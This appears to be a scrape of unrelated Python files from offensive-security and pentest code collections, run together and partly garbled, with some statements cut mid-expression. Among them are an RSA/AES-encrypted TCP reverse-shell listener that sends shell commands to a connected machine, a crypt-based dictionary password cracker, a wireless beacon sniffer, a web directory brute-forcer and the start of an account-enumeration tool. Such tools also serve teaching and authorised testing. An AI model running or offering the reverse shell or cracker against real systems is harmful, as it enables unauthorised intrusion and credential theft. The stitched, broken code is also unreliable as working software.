#!/usr/bin/env python ''' Author: Christopher Duffy Date: February 2015 Name: Purpose: Provides the details related to a systems interfaces Copyright (c) 2015, Christopher Duffy All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ''' import sys try: import netifaces except: sys.exit("[!] Install the netifaces library: pip install netifaces") gateways = {} network_ifaces={} def get_interfaces(): interfaces = netifaces.interfaces() return interfaces def get_gateways(): gateway_dict = {} gws = netifaces.gateways() for gw in gws: try: gateway_iface = gws[gw][netifaces.AF_INET] gateway_ip, iface = gateway_iface[0], gateway_iface[1] gw_list =[gateway_ip, iface] gateway_dict[gw]=gw_list except: pass return gateway_dict def get_addresses(interface): addrs = netifaces.ifaddresses(interface) link_addr = addrs[netifaces.AF_LINK] iface_addrs = addrs[netifaces.AF_INET] iface_dict = iface_addrs[0] link_dict = link_addr[0] hwaddr = link_dict.get('addr') iface_addr = iface_dict.get('addr') iface_broadcast = iface_dict.get('broadcast') iface_netmask = iface_dict.get('netmask') return hwaddr, iface_addr, iface_broadcast, iface_netmask def get_networks(gateways_dict): networks_dict = {} for key, value in gateways.iteritems(): gateway_ip, iface = value[0], value[1] hwaddress, addr, broadcast, netmask = get_addresses(iface) network = {'gateway': gateway_ip, 'hwaddr' : hwaddress, 'addr' : addr, 'broadcast' : broadcast, 'netmask' : netmask} networks_dict[iface] = network return networks_dict gateways = get_gateways() network_ifaces = get_networks(gateways) print(network_ifaces)
from owtf.managers.resource import get_resources from owtf.plugin.helper import plugin_helper DESCRIPTION = "LDAP Plugin to assist manual testing" def run(PluginInfo): resource = get_resources("ExternalLDAPinjection") Content = plugin_helper.resource_linklist("Online Resources", resource) return Content
from scapy.all import * import struct interface = 'mon0' ap_list = [] def info(fm): if fm.haslayer(Dot11): if ((fm.type == 0) & (fm.subtype==8)): if fm.addr2 not in ap_list: ap_list.append(fm.addr2) print "SSID--> ",,"-- BSSID --> ",fm.addr2, \ "-- Channel--> ", ord(fm[Dot11Elt:3].info) sniff(iface=interface,prn=info)
""" owtf.lib.exceptions ~~~~~~~~~~~~~~~~~~~ Declares the framework exceptions and HTTP errors """ try: from http.client import responses except ImportError: from httplib import responses import tornado.web class FrameworkException(Exception): def __init__(self, value): self.parameter = value def __repr__(self): return self.parameter class APIError(tornado.web.HTTPError): """Equivalent to ``RequestHandler.HTTPError`` except for in name""" def api_assert(condition, *args, **kwargs): """Assertion to fail with if not ``condition`` Asserts that ``condition`` is ``True``, else raises an ``APIError`` with the provided ``args`` and ``kwargs`` :type condition: bool """ if not condition: raise APIError(*args, **kwargs) class FrameworkAbortException(FrameworkException): pass class PluginAbortException(FrameworkException): pass class UnreachableTargetException(FrameworkException): pass class UnresolvableTargetException(FrameworkException): pass class DBIntegrityException(FrameworkException): pass class InvalidTargetReference(FrameworkException): pass class InvalidSessionReference(FrameworkException): pass class InvalidTransactionReference(FrameworkException): pass class InvalidParameterType(FrameworkException): pass class InvalidWorkerReference(FrameworkException): pass class InvalidErrorReference(FrameworkException): pass class InvalidWorkReference(FrameworkException): pass class InvalidConfigurationReference(FrameworkException): pass class InvalidUrlReference(FrameworkException): pass class InvalidActionReference(FrameworkException): pass class InvalidMessageReference(FrameworkException): pass class InvalidMappingReference(FrameworkException): pass class DatabaseNotRunningException(Exception): pass class PluginException(Exception): pass class PluginsDirectoryDoesNotExist(PluginException): """The specified plugin directory does not exist.""" class PluginsAlreadyLoaded(PluginException): """`load_plugins()` called twice."""
# Python For Offensive PenTest # Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7 # # Download Pycrypto source # # For Kali, after extract the tar file, invoke "python install" # Hybrid - Server- TCP Reverse Shell import socket from Crypto.PublicKey import RSA from Crypto.Cipher import AES import string import random def encrypt_AES_KEY(KEY): publickey ="""-----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA9UHDhYrU529GsfkJqKSF 6q3CfpSkb00gA12c3NuNb2QZgpkHRsfQ/zPmKlFvuAHNjn43j3ser/SQ6q0GN92N niK9cne+UdKoXf0e+8PqZsoIlOXh9QNPnuXmD+o6tXevh3ZpUyCaNPiF+g0fHv12 w1xCkVki5Kp+hf8YbB6lCxUJvf8a0n1bWCBKkbe2jJUOjkVLIvUVkojCOw61stHZ QJtFgGQUup4D0cozs5bXHfRw7Tc7Q2VEnTOGfIEZJcC7FbboMaQxRu0v7KKH93OR HlIEbZFFX7kelrR8S8pnIfspZXHrAmSImlWDljeSZpMViTGLBniw0kztDLtQJSY4 HL4SkOTm0QgsO1dkbs3PR2RsYh7aaDWgAATT0MPhQMUNMIdceaEJeYiudsBFMLMQ JHok3+0MR/1eO4aO2nH5ojANXxOyec8V3IXz0LZCGFsrfB9gv9TD/YRs6qEF62wl tDqIGyVQoXQNmxriH+0YgMwxUPKHiGVCaPYXe5dpd89GeGYC6Jcbc9+q9cjfG+kR GQtgr/w48RM79bBHw5A0b3uXqmjTPTgZ6hMxShMWngSHOm5BV+ZY1MyEA51+qDon GOLCYLRGWnF1PyCMoxX+qVEE6gAFVNkYULdjiWpU+gmoYxe0rNqjCzbUdXizUGVQ Ua9aLXDYbrOz6O1gKngclsECAwEAAQ== -----END PUBLIC KEY-----""" encryptor = RSA.importKey(publickey) encriptedData=encryptor.encrypt(KEY, 0) return encriptedData[0] def encrypt(message): encrypto =, AES.MODE_CTR, counter=lambda: counter) return encrypto.encrypt(message) def decrypt(message): decrypto =, AES.MODE_CTR, counter=lambda: counter) return decrypto.decrypt(message) def connect(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("", 8080)) s.listen(1) print '[+] Listening for incoming TCP connection on port 8080' conn, addr = s.accept() print '[+] We got a connection from: ', addr global key key = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase + string.digits + '^!\$%&/()=?{[]}+~#-_.:,;<>|\\') for _ in range(32)) print "Generated AES Key " + str(key) conn.send ( encrypt_AES_KEY(key) ) global counter counter = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase + string.digits + '^!\$%&/()=?{[]}+~#-_.:,;<>|\\') for _ in range(16)) conn.send ( encrypt_AES_KEY(counter) ) while True: command = raw_input("Shell> ") command = encrypt(command) if 'terminate' in command: conn.send('terminate') conn.close() break else: conn.send(command) print decrypt ( conn.recv(1024) ) def main (): connect() main()
# Taken from Python 2.6.4 for use by """Shared support for scanning document type declarations in HTML and XHTML. This module is used as a foundation for the HTMLParser and sgmllib modules (indirectly, for htmllib as well). It has no documented public API and should not be used directly. """ import re _declname_match = re.compile(r'[a-zA-Z][-_.a-zA-Z0-9]*\s*').match _declstringlit_match = re.compile(r'(\'[^\']*\'|"[^"]*")\s*').match _commentclose = re.compile(r'--\s*>') _markedsectionclose = re.compile(r']\s*]\s*>') # An analysis of the MS-Word extensions is available at # _msmarkedsectionclose = re.compile(r']\s*>') del re class ParserBase: """Parser base class which provides some common support methods used by the SGML/HTML and XHTML parsers.""" def __init__(self): if self.__class__ is ParserBase: raise RuntimeError( "markupbase.ParserBase must be subclassed") def error(self, message): raise NotImplementedError( "subclasses of ParserBase must override error()") def reset(self): self.lineno = 1 self.offset = 0 def getpos(self): """Return current line number and offset.""" return self.lineno, self.offset # Internal -- update line number and offset. This should be # called for each piece of data exactly once, in order -- in other # words the concatenation of all the input strings to this # function should be exactly the entire input. def updatepos(self, i, j): if i >= j: return j rawdata = self.rawdata nlines = rawdata.count("\n", i, j) if nlines: self.lineno = self.lineno + nlines pos = rawdata.rindex("\n", i, j) # Should not fail self.offset = j-(pos+1) else: self.offset = self.offset + j-i return j _decl_otherchars = '' # Internal -- parse declaration (for use by subclasses). def parse_declaration(self, i): # This is some sort of declaration; in "HTML as # deployed," this should only be the document type # declaration ("<!DOCTYPE html...>"). # ISO 8879:1986, however, has more complex # declaration syntax for elements in <!...>, including: # --comment-- # [marked section] # name in the following list: ENTITY, DOCTYPE, ELEMENT, # ATTLIST, NOTATION, SHORTREF, USEMAP, # LINKTYPE, LINK, IDLINK, USELINK, SYSTEM rawdata = self.rawdata j = i + 2 assert rawdata[i:j] == "<!", "unexpected call to parse_declaration" if rawdata[j:j+1] == ">": # the empty comment <!> return j + 1 if rawdata[j:j+1] in ("-", ""): # Start of comment followed by buffer boundary, # or just a buffer boundary. return -1 # A simple, practical version could look like: ((name|stringlit) S*) + '>' n = len(rawdata) if rawdata[j:j+2] == '--': #comment # Locate --.*-- as the body of the comment return self.parse_comment(i) elif rawdata[j] == '[': #marked section # Locate [statusWord [...arbitrary SGML...]] as the body of the marked section # Where statusWord is one of TEMP, CDATA, IGNORE, INCLUDE, RCDATA # Note that this is extended by Microsoft Office "Save as Web" function # to include [if...] and [endif]. return self.parse_marked_section(i) else: #all other declaration elements decltype, j = self._scan_name(j, i) if j < 0: return j if decltype == "doctype": self._decl_otherchars = '' while j < n: c = rawdata[j] if c == ">": # end of declaration syntax data = rawdata[i+2:j] if decltype == "doctype": self.handle_decl(data) else: self.unknown_decl(data) return j + 1 if c in "\"'": m = _declstringlit_match(rawdata, j) if not m: return -1 # incomplete j = m.end() elif c in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ": name, j = self._scan_name(j, i) elif c in self._decl_otherchars: j = j + 1 elif c == "[": # this could be handled in a separate doctype parser if decltype == "doctype": j = self._parse_doctype_subset(j + 1, i) elif decltype in ("attlist", "linktype", "link", "element"): # must tolerate []'d groups in a content model in an element declaration # also in data attribute specifications of attlist declaration # also link type declaration subsets in linktype declarations # also link attribute specification lists in link declarations self.error("unsupported '[' char in %s declaration" % decltype) else: self.error("unexpected '[' char in declaration") else: self.error( "unexpected %r char in declaration" % rawdata[j]) if j < 0: return j return -1 # incomplete # Internal -- parse a marked section # Override this to handle MS-word extension syntax <![if word]>content<![endif]> def parse_marked_section(self, i, report=1): rawdata= self.rawdata assert rawdata[i:i+3] == '<![', "unexpected call to parse_marked_section()" sectName, j = self._scan_name( i+3, i ) if j < 0: return j if sectName in ("temp", "cdata", "ignore", "include", "rcdata"): # look for standard ]]> ending match=, i+3) elif sectName in ("if", "else", "endif"): # look for MS Office ]> ending match=, i+3) else: self.error('unknown status keyword %r in marked section' % rawdata[i+3:j]) if not match: return -1 if report: j = match.start(0) self.unknown_decl(rawdata[i+3: j]) return match.end(0) # Internal -- parse comment, return length or -1 if not terminated def parse_comment(self, i, report=1): rawdata = self.rawdata if rawdata[i:i+4] != '<!--': self.error('unexpected call to parse_comment()') match =, i+4) if not match: return -1 if report: j = match.start(0) self.handle_comment(rawdata[i+4: j]) return match.end(0) # Internal -- scan past the internal subset in a <!DOCTYPE declaration, # returning the index just past any whitespace following the trailing ']'. def _parse_doctype_subset(self, i, declstartpos): rawdata = self.rawdata n = len(rawdata) j = i while j < n: c = rawdata[j] if c == "<": s = rawdata[j:j+2] if s == "<": # end of buffer; incomplete return -1 if s != "<!": self.updatepos(declstartpos, j + 1) self.error("unexpected char in internal subset (in %r)" % s) if (j + 2) == n: # end of buffer; incomplete return -1 if (j + 4) > n: # end of buffer; incomplete return -1 if rawdata[j:j+4] == "<!--": j = self.parse_comment(j, report=0) if j < 0: return j continue name, j = self._scan_name(j + 2, declstartpos) if j == -1: return -1 if name not in ("attlist", "element", "entity", "notation"): self.updatepos(declstartpos, j + 2) self.error( "unknown declaration %r in internal subset" % name) # handle the individual names meth = getattr(self, "_parse_doctype_" + name) j = meth(j, declstartpos) if j < 0: return j elif c == "%": # parameter entity reference if (j + 1) == n: # end of buffer; incomplete return -1 s, j = self._scan_name(j + 1, declstartpos) if j < 0: return j if rawdata[j] == ";": j = j + 1 elif c == "]": j = j + 1 while j < n and rawdata[j].isspace(): j = j + 1 if j < n: if rawdata[j] == ">": return j self.updatepos(declstartpos, j) self.error("unexpected char after internal subset") else: return -1 elif c.isspace(): j = j + 1 else: self.updatepos(declstartpos, j) self.error("unexpected char %r in internal subset" % c) # end of buffer reached return -1 # Internal -- scan past <!ELEMENT declarations def _parse_doctype_element(self, i, declstartpos): name, j = self._scan_name(i, declstartpos) if j == -1: return -1 # style content model; just skip until '>' rawdata = self.rawdata if '>' in rawdata[j:]: return rawdata.find(">", j) + 1 return -1 # Internal -- scan past <!ATTLIST declarations def _parse_doctype_attlist(self, i, declstartpos): rawdata = self.rawdata name, j = self._scan_name(i, declstartpos) c = rawdata[j:j+1] if c == "": return -1 if c == ">": return j + 1 while 1: # scan a series of attribute descriptions; simplified: # name type [value] [#constraint] name, j = self._scan_name(j, declstartpos) if j < 0: return j c = rawdata[j:j+1] if c == "": return -1 if c == "(": # an enumerated type; look for ')' if ")" in rawdata[j:]: j = rawdata.find(")", j) + 1 else: return -1 while rawdata[j:j+1].isspace(): j = j + 1 if not rawdata[j:]: # end of buffer, incomplete return -1 else: name, j = self._scan_name(j, declstartpos) c = rawdata[j:j+1] if not c: return -1 if c in "'\"": m = _declstringlit_match(rawdata, j) if m: j = m.end() else: return -1 c = rawdata[j:j+1] if not c: return -1 if c == "#": if rawdata[j:] == "#": # end of buffer return -1 name, j = self._scan_name(j + 1, declstartpos) if j < 0: return j c = rawdata[j:j+1] if not c: return -1 if c == '>': # all done return j + 1 # Internal -- scan past <!NOTATION declarations def _parse_doctype_notation(self, i, declstartpos): name, j = self._scan_name(i, declstartpos) if j < 0: return j rawdata = self.rawdata while 1: c = rawdata[j:j+1] if not c: # end of buffer; incomplete return -1 if c == '>': return j + 1 if c in "'\"": m = _declstringlit_match(rawdata, j) if not m: return -1 j = m.end() else: name, j = self._scan_name(j, declstartpos) if j < 0: return j # Internal -- scan past <!ENTITY declarations def _parse_doctype_entity(self, i, declstartpos): rawdata = self.rawdata if rawdata[i:i+1] == "%": j = i + 1 while 1: c = rawdata[j:j+1] if not c: return -1 if c.isspace(): j = j + 1 else: break else: j = i name, j = self._scan_name(j, declstartpos) if j < 0: return j while 1: c = self.rawdata[j:j+1] if not c: return -1 if c in "'\"": m = _declstringlit_match(rawdata, j) if m: j = m.end() else: return -1 # incomplete elif c == ">": return j + 1 else: name, j = self._scan_name(j, declstartpos) if j < 0: return j # Internal -- scan a name token and the new position and the token, or # return -1 if we've reached the end of the buffer. def _scan_name(self, i, declstartpos): rawdata = self.rawdata n = len(rawdata) if i == n: return None, -1 m = _declname_match(rawdata, i) if m: s = name = s.strip() if (i + len(s)) == n: return None, -1 # end of buffer return name.lower(), m.end() else: self.updatepos(declstartpos, i) self.error("expected name token at %r" % rawdata[declstartpos:declstartpos+20]) # To be overridden -- handlers for unknown objects def unknown_decl(self, data): pass
def update(): print "to do : do git update"
from owtf.plugin.helper import plugin_helper DESCRIPTION = "Plugin to assist manual testing" def run(PluginInfo): Content = plugin_helper.HtmlString("Intended to show helpful info in the future") return Content
#!/usr/bin/python # -*- coding: utf-8 -*- import crypt def testPass(cryptPass): salt = cryptPass[0:2] dictFile = open('dictionary.txt', 'r') for word in dictFile.readlines(): word = word.strip('\n') cryptWord = crypt.crypt(word, salt) if cryptWord == cryptPass: print '[+] Found Password: ' + word + '\n' return print '[-] Password Not Found.\n' return def main(): passFile = open('passwords.txt') for line in passFile.readlines(): if ':' in line: user = line.split(':')[0] cryptPass = line.split(':')[1].strip(' ') print '[*] Cracking Password For: ' + user testPass(cryptPass) if __name__ == '__main__': main()
#!/usr/bin/env python ''' Author: Christopher Duffy Date: April 2015 Name: Purpose: To identify unlinked and hidden files or directories within web applications Copyright (c) 2015, Christopher Duffy All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ''' import urllib2, argparse, sys def host_test(filename, host): file = "headrequests.log" bufsize = 0 e = open(file, 'a', bufsize) print("[*] Reading file %s") % (file) with open(filename) as f: locations = f.readlines() for item in locations: target = host + "/" + item try: request = urllib2.Request(target) request.get_method = lambda : 'GET' response = urllib2.urlopen(request) except: print("[-] %s is invalid") % (str(target.rstrip('\n'))) response = None if response != None: print("[+] %s is valid") % (str(target.rstrip('\n'))) details = e.write(str(details)) e.close() def main(): # If script is executed at the CLI usage = '''usage: %(prog)s [-t] [-f wordlist] -q -v -vv -vvv''' parser = argparse.ArgumentParser(usage=usage) parser.add_argument("-t", action="store", dest="target", default=None, help="Host to test") parser.add_argument("-f", action="store", dest="filename", default=None, help="Filename of directories or pages to test for") parser.add_argument("-v", action="count", dest="verbose", default=1, help="Verbosity level, defaults to one, this outputs each command and result") parser.add_argument("-q", action="store_const", dest="verbose", const=0, help="Sets the results to be quiet") parser.add_argument('--version', action='version', version='%(prog)s 0.42b') args = parser.parse_args() # Argument Validator if len(sys.argv)==1: parser.print_help() sys.exit(1) if ( == None) or (args.filename == None): parser.print_help() sys.exit(1) # Set Constructors verbose = args.verbose # Verbosity level filename = args.filename # The data to use for the dictionary attack target = # Password or hash to test against default is admin host_test(filename, target) if __name__ == '__main__': main()
from XtremeWebAPP.xtreme_server.models import * from django.contrib import admin
#!/usr/bin/python # Converts to hex, ascii, decimal, octal, binary, base64, or little-endian. import sys from binascii import unhexlify, b2a_base64 def ascToHex(string): in_hex = string.encode('hex') return in_hex def toLittleEndian(string): little_endian = '0x' + "".join(reversed([string[i:i+2] for i in range(0, len(string), 2)])) return little_endian def toDecimal(string): in_dec = int(string, 16) return in_dec def toAscii(string): in_ascii = string.decode('hex') return in_ascii def toOctal(string): in_oct = "" c = 0 for char in string: c = ord(char) octa = oct(c) in_oct += ' ' + str(octa) return in_oct def hexToBin(string): in_hex = int(string, 16) in_bin = bin(in_hex)[2:] return in_bin def binToHex(string): in_hex = hex(int(string, 2)) return in_hex def decToHex(number): in_hex = hex(int(number)) return in_hex def hexToB64(string): raw = unhexlify(string) in_b64 = b2a_base64(raw) return in_b64 def main(): if len(sys.argv[1:]) != 2: print ''' format_convert: Convert to hex, ascii, decimal, octal, binary, base64 or little-endian. Usage: ./ <string> <option> Example: ./ 41 -2ascii Options: -asc2hex : Ascii to hex -2ascii : Hex to ascii -2dec : To decimal -2oct : To octal -2le : Big endian to little endian -hex2bin : Hex to binary -bin2hex : Binary to hex -dec2hex : Decimal to hex -hex2b64 : Hex to base64 ''' sys.exit(0) # Original input to_convert = sys.argv[1] mode = sys.argv[2] # Conversion if mode == '-asc2hex': in_hex = ascToHex(to_convert) little_endian = toLittleEndian(in_hex) print 'Original:', to_convert, '\nHex:', '0x' + in_hex print 'Little-endian:', little_endian elif mode == '-2ascii': in_ascii = toAscii(to_convert) print 'Original:', to_convert, '\nAscii:', in_ascii elif mode == '-2dec': in_dec = toDecimal(to_convert) print 'Original:', to_convert, '\nDecimal:', in_dec elif mode == '-2oct': in_oct = toOctal(to_convert) print 'Original:', to_convert, '\nOctal:', in_oct, '\n\n[!] Note: Remove any extra leading zeroes.' elif mode == '-2le': inpt = toAscii(to_convert) in_hex = ascToHex(inpt) in_LE = toLittleEndian(in_hex) print 'Original:', '0x' + to_convert, '\nLittle-endian:', in_LE elif mode == '-hex2bin': in_bin = hexToBin(to_convert) print 'Originial:', to_convert, '\nBinary:', in_bin elif mode == '-bin2hex': in_hex = binToHex(to_convert) print in_hex elif mode == '-dec2hex': in_hex = decToHex(to_convert) print in_hex elif mode == '-hex2b64': in_b64 = hexToB64(to_convert) print in_b64 else: print 'Improper format. Review and re-submit.\n' sys.exit(0) main()
#! /usr/bin/python3.5 class ExceptionHandeling(): def __init__(self): pass def div_1(self,num1,num2): try: num3=num1/num2 print("Division result : " +str(num3)) except Exception as ex: print("Exception : "+str(ex)) def div_2(self,num1,num2): try: num3=num1/num2 print("Division result : " +str(num3)) except Exception as ex: print("Exception : "+str(ex)) finally: print("Cleaning Up") del num1 del num2 def div_3(self,num1,num2): try: if num2 == 0: raise ValueError('Division by 0 will throw exception') else: num3=num1/num2 print("Division result : " +str(num3)) except Exception as exc: print("Exception : "+str(exc)) obj=ExceptionHandeling() obj.div_1(10,2) obj.div_1(10,0) print("\n") obj.div_2(10,2) obj.div_2(10,0) print("\n") obj.div_3(10,2) obj.div_3(10,0)
#! /usr/bin/env python # -*- coding: utf-8 -*- # """ scythe: account enumerator Account Enumerator is designed to make it simple to perform account enumeration as part of security testing. The framework offers the ability to easily create new modules (XML files) and speed up the process of testing. This tool was created with 2 main use cases in mind: - The ability to test a range of email addresses across a range of sites (e.g. social media, blogging platforms, etc...) to find where those targets have active accounts. This can be useful in a social engineering test where you have email accounts for a company and want to list where these users have used their work email for 3rd party web based services. - The ability to quickly create a custom testcase module and use it to enumerate for a list of active accounts. Using either a list of know usernames, email addresses, or a dictionary of common account names. This program is released as is and is not designed to be used to test again sites where you do not have permission. Any modules provided are for demonstration purposes and may breach end user license agreements if used against a site. Your mileage may vary... be responsible! External module depenancies: colorama (Windows only, optional) """ import os import re import signal import urllib import urllib2 import string import textwrap import sys import traceback import time import Queue import random from Cookie import BaseCookie from threading import Thread, activeCount, Lock, current_thread from random import Random from optparse import OptionParser, OptionGroup, SUPPRESS_HELP from array import * from xml.dom.minidom import parse __author__ = 'Chris John Riley' __license__ = 'BSD (3-Clause)' __version__ = '0.2.81' __codename__ = 'Lazy Lizard' __date__ = '24 May 2013' __maintainer__ = 'ChrisJohnRiley' __email__ = '' __status__ = 'Beta' modules = [] accounts = [] success = [] color = {} queue = Queue.Queue() startTime = time.clock() sigint = False def logo(): # because ASCII-art is the future! logo = ''' ,, mm `7MM MM MM ,pP"Ybd ,p6"bo `7M' `MF'mmMMmm MMpMMMb. .gP"Ya 8I `" 6M' OO VA ,V MM MM MM ,M' Yb `YMMMa. 8M VA ,V MM MM MM 8M"""""" L. I8 YM. , VVV MM MM MM YM. , M9mmmP' YMbmd' ,V `Mbmo.JMML JMML.`Mbmmd' ,V OOb" ::: account harvester :::''' # add version, codename and maintainer to logo print logo print string.rjust('ver ' + __version__ + ' (' + __codename__ + ')', 74) print string.rjust(__maintainer__, 73) def extract_module_data(file, module_dom): # extract module information from the provided dom for each in module_dom: try: xmlData = {} # try/except blocks to handle badly formed XML modules try: xmlData['name'] = each.getElementsByTagName('name')[0].firstChild.nodeValue except (IndexError, AttributeError): xmlData['name'] = 'unspecified' # set URL - prepend http:// if not present in string if not each.getElementsByTagName('url')[0].firstChild.nodeValue.startswith('http'): xmlData['url'] = 'http://' + each.getElementsByTagName('url')[0].firstChild.nodeValue else: xmlData['url'] = each.getElementsByTagName('url')[0].firstChild.nodeValue # set Method try: xmlData['method'] = each.getElementsByTagName('method')[0].firstChild.nodeValue except (IndexError, AttributeError): # default to GET if not specified xmlData['method'] = 'GET' # set POST Parameters if set in the module XML try: if each.getElementsByTagName('postParameters')[0].firstChild.nodeValue.lower() == 'false': # handle instances where people enter False insterad of leaving this field blank xmlData['postParameters'] = '' else: xmlData['postParameters'] = \ each.getElementsByTagName('postParameters')[0].firstChild.nodeValue except (IndexError, AttributeError): xmlData['postParameters'] = '' # set headers if set in the module XML try: if each.getElementsByTagName('headers')[0].firstChild.nodeValue.lower() == 'false': # handle instances where people enter False insterad of leaving this field blank xmlData['headers'] = '' else: xmlData['headers'] = \ each.getElementsByTagName('headers')[0].firstChild.nodeValue.split(",") except (IndexError, AttributeError): xmlData['headers'] = '' # set request cookie if set in the module XML try: if each.getElementsByTagName('requestCookie')[0].firstChild.nodeValue.lower() == 'true': xmlData['requestCookie'] = True else: xmlData['requestCookie'] = False except (IndexError, AttributeError): xmlData['requestCookie'] = False # set csrf mode if set in the module XML # Extract csrf_url and csrf_regex if present # if not default to False try: if each.getElementsByTagName('requestCSRF')[0].firstChild.nodeValue.lower() == 'false': xmlData['requestCSRF'] = False # set csrf_url and csrf_regex to False by default xmlData['csrf_url'] = False xmlData['csrf_regex'] = False else: xmlData['requestCSRF'] = True if each.getElementsByTagName('csrf_url')[0].firstChild: xmlData['csrf_url'] = \ each.getElementsByTagName('csrf_url')[0].firstChild.nodeValue else: # if no specific csrf_url is set, default to xmlData['url']' xmlData['csrf_url'] = xmlData['url'] if each.getElementsByTagName('csrf_regex')[0].firstChild: xmlData['csrf_regex'] = \ each.getElementsByTagName('csrf_regex')[0].firstChild.nodeValue else: xmlData['csrf_regex'] = 'unspecified' except (IndexError, AttributeError): # if requestCSRF not present or noneType xmlData['requestCSRF'] = False xmlData['csrf_url'] = False xmlData['csrf_regex'] = False # set success match if specified in the module XML try: xmlData['successmatch'] = \ each.getElementsByTagName('successmatch')[0].firstChild.nodeValue except (IndexError, AttributeError): xmlData['successmatch'] = '' # set negative match if specified in the module XML try: # handle instances where people enter False insterad of leaving this field blank if each.getElementsByTagName('negativematch')[0].firstChild.nodeValue.lower() == 'false': xmlData['negativematch'] = '' else: xmlData['negativematch'] = \ each.getElementsByTagName('negativematch')[0].firstChild.nodeValue except (IndexError, AttributeError): xmlData['negativematch'] = '' # set error match if specified in the module XML try: # handle instances where people enter False insterad of leaving this field blank if each.getElementsByTagName('errormatch')[0].firstChild.nodeValue.lower() == 'false': xmlData['errormatch'] = '' else: xmlData['errormatch'] = \ each.getElementsByTagName('errormatch')[0].firstChild.nodeValue except (IndexError, AttributeError): xmlData['errormatch'] = '' # set message if specified in the module XML try: # handle instances where people enter False insterad of leaving this field blank if each.getElementsByTagName('message')[0].firstChild.nodeValue.lower() == 'false': xmlData['message'] = '' else: xmlData['message'] = \ each.getElementsByTagName('message')[0].firstChild.nodeValue except (IndexError, AttributeError): xmlData['message'] = '' # set module date try: xmlData['date'] = each.getElementsByTagName('date')[0].firstChild.nodeValue except (IndexError, AttributeError): xmlData['date'] = 'unspecified' # set module version if specified in the module XML try: xmlData['version'] = each.getElementsByTagName('version')[0].firstChild.nodeValue except (IndexError, AttributeError): xmlData['version'] = 'unspecified' # set module author try: xmlData['author'] = each.getElementsByTagName('author')[0].firstChild.nodeValue except (IndexError, AttributeError): xmlData['author'] = 'unlisted' # set category try: xmlData['category'] = each.getElementsByTagName('category')[0].firstChild.nodeValue except (IndexError, AttributeError): xmlData['category'] = 'unspecified' # filter modules based on selected categories if xmlData['category'].lower() in (cat.lower() for cat in opts.category) or \ "all" in (cat.lower() for cat in opts.category) or \ (opts.single.lower() and opts.single.lower() in xmlData['name'].lower()) or \ (file.lower() in opts.single.lower()): if xmlData['category'].lower() == "example" and \ ("example" not in (cat.lower() for cat in opts.category) \ and not opts.single): # skip example module when running with all or default settings if opts.verbose: print "\t[" + color['red'] + "!" + color['end'] \ + "] Skipping example module : %s" % xmlData['name'] else: print "\t[" + color['yellow'] + "+" + color['end'] \ +"] Extracted module information from %s" \ % xmlData['name'] modules.append(xmlData) # print module message if present if xmlData['message']: print textwrap.fill(("\t[" + color['yellow'] + "!" + color['end'] \ +"] "+ color['red'] + "Note" + color['end'] +" [%s]:" \ % xmlData['name']), initial_indent='', subsequent_indent='\t -> ', width=100) print textwrap.fill(("\t -> %s" % xmlData['message']), initial_indent='', subsequent_indent='\t -> ', width=80) else: if opts.debug and not opts.category == "single": print "\t[" + color['red'] + "!" + color['end'] \ + "] Skipping module %s. Not in category (%s)" \ % (xmlData['name'], opts.category) except Exception, ex: print "\t[" + color['red'] + "!" + color['end'] \ + "] Failed to extracted module information\n\t\tError: %s" % ex if opts.debug: print "\n\t[" + color['red'] + "!" + color['end'] + "] ", traceback.print_exc() continue def output_modules(): # print information about the loaded module(s) print "\n 